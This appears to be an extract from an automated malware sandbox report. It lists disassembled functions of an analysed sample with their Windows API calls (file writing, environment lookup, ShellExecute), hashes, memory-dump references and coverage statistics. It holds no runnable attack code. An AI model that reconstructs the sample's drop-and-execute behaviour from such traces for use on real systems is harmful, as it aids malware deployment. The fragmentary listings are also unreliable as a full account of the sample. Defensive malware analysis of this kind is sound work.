                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EECF10: wcschr.MSVCRT ref: 00EECF8D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EECF10: iswdigit.MSVCRT ref: 00EECFEE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,00000000,00000000,00000002), ref: 00EFCB58
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: REM/?
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 49548326-4093888634
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6e98209be7a74e30b1a376bcb02e1989b8cab72d6d714d5943ca444cc8fda7e4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6e35d0e65771dc05d3a855cfec0f71dac279aa7db753e5e7c1b3b3db7495dbe9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e98209be7a74e30b1a376bcb02e1989b8cab72d6d714d5943ca444cc8fda7e4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F31E73171034D57D724DF76AC42A6AB3E6EF40314F35683EE102EB191DAB5EC019756
                                                                                                                                                                                                                                                                                                                                                      Function 00EEAD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00EEB11F), ref: 00EFCB8B
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 00EFCC2D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                      • String ID: -
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ac7131a0687311bd9cbf461c246c88a6d6782acd49e05ca4ff4a111949786033
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3031a2f222faf41f3b5b694be6bfe49407d190c5ca81dcbc4987431b00a56bf7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac7131a0687311bd9cbf461c246c88a6d6782acd49e05ca4ff4a111949786033
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB21293160014C9BCB15A72DDC957BE77A1DBC0308F3A612CE902BB294DE749D42D782
                                                                                                                                                                                                                                                                                                                                                      Function 00F0974B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74timeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F097DA
                                                                                                                                                                                                                                                                                                                                                      • SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F00138,?,00000021,00000021,?,?,?,?,00000001,?,00000200,?,L#,?,00000000), ref: 00F097E2
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileTime_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: L#
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1911523439-2643830878
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 877da9ad09423f17f1f550b022ffa90c73244335f8209730d49761f90a43872c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0757c2f9adb42b23b42a08d96e9ba81d64ff1a2d4aa88a65d74c33a3d9058ccb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 877da9ad09423f17f1f550b022ffa90c73244335f8209730d49761f90a43872c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC11DA72614148ABD728EF25DC46C6F77A5EBC5320B20C52DF512D71D2EEB59D01B620
                                                                                                                                                                                                                                                                                                                                                      Function 00F08AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F08AC9
                                                                                                                                                                                                                                                                                                                                                      • printf.MSVCRT ref: 00F08B24
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                                                                                                                                                      • String ID: %3d
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 70aaec13b4a001711dfb6d13c76d460c7d86b7c4fc164eac7ddbd7a203961ee9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cc2bbcff562040493ea4593a527321a6d110bcb7e8d70d777b51a5db4c1365da
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70aaec13b4a001711dfb6d13c76d460c7d86b7c4fc164eac7ddbd7a203961ee9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80149B16002087BE7216AA69C87FEB3ADDDB84BE0F044015FB09B50C1E6B59C51E271
                                                                                                                                                                                                                                                                                                                                                      Function 00EF2239 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00EE8E86,00EE8E5A,00000000), ref: 00EEDC98
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: RtlFreeHeap.NTDLL ref: 00EEDC9F
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF2286
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree_wcsnicmpwcstol
                                                                                                                                                                                                                                                                                                                                                      • String ID: F1$/
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2867344635-3908456548
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d8230efbcc8e962820716ae787ff78e996f3f15982a8d8b078ad4e5c3d83af58
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f9fa2d69472e073b94ec2cfe1fd379704155490a3746df560692780a4be8dce0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8230efbcc8e962820716ae787ff78e996f3f15982a8d8b078ad4e5c3d83af58
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0283260421D67D72466689C45ABFB3DE8BC0754F181929FB06B7190FF91DD01D2A1
                                                                                                                                                                                                                                                                                                                                                      Function 00EEAB7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 287713880-1539845467
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: fe130c715e636816308f4145d90ca53ded7074990cf1de1531053511a189b065
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ed899d5d52efa9bba07a21af464384e73c4567e04f24096a039b0ef9359d5c7c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe130c715e636816308f4145d90ca53ded7074990cf1de1531053511a189b065
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE0DF336041EA9B46300A0FBC188B7B2DB9F97B6431E243FF800B6110F7616C019193

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:14.6%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:32
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1611591150-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 27ee011044e7d5e793fd8ebd023162aebb77fc20787e11e0718a971f15838409
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A1121F5E00104BBCB00EBACEC85F5B77ACA798304F104479F909E73A1E979EA489765
                                                                                                                                                                                                                                                                                                                                                      Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2742963760-4073750446
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ce340559ed643e80c0758f702ca7b046c498c1d309c8b568501c00ab43499a41
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE7125F1E001049BDB54DB5CDC81BDE77B9EB44309F04417AF60AFB391E639AA848B59
                                                                                                                                                                                                                                                                                                                                                      Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2992075992-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3ba0f7a8f6b0ede00da755a29cfea894b35039c78ebbae5d4c541c040a1a5c4d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 184155F0E001049BDF58DB58DC91B9E77B9DB44309F0441B9F60AFB391E538AA88CB59
                                                                                                                                                                                                                                                                                                                                                      Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      • 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9, xrefs: 0040106E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                                                                                                                                      • String ID: 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2803490479-4106697161
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
                                                                                                                                                                                                                                                                                                                                                      Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000B.00000001.1440818332.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 0000000B.00000001.1440818332.0000000000571000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_1_400000_aymtmquJ.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID: D`4wD`4w$D`4wD`4w
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4108700736-3394693991
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e83efdde7d34d28be519ed2e6888d9f42519b086e2d7e65c64a29ab7e0d92d08
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99F0F8B4E00209EFCB40EFADE981D8A77F8AB48304F104075F908D7751EA34EA488B64

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:8.4%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:46.6%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:28.6%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:294
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:30
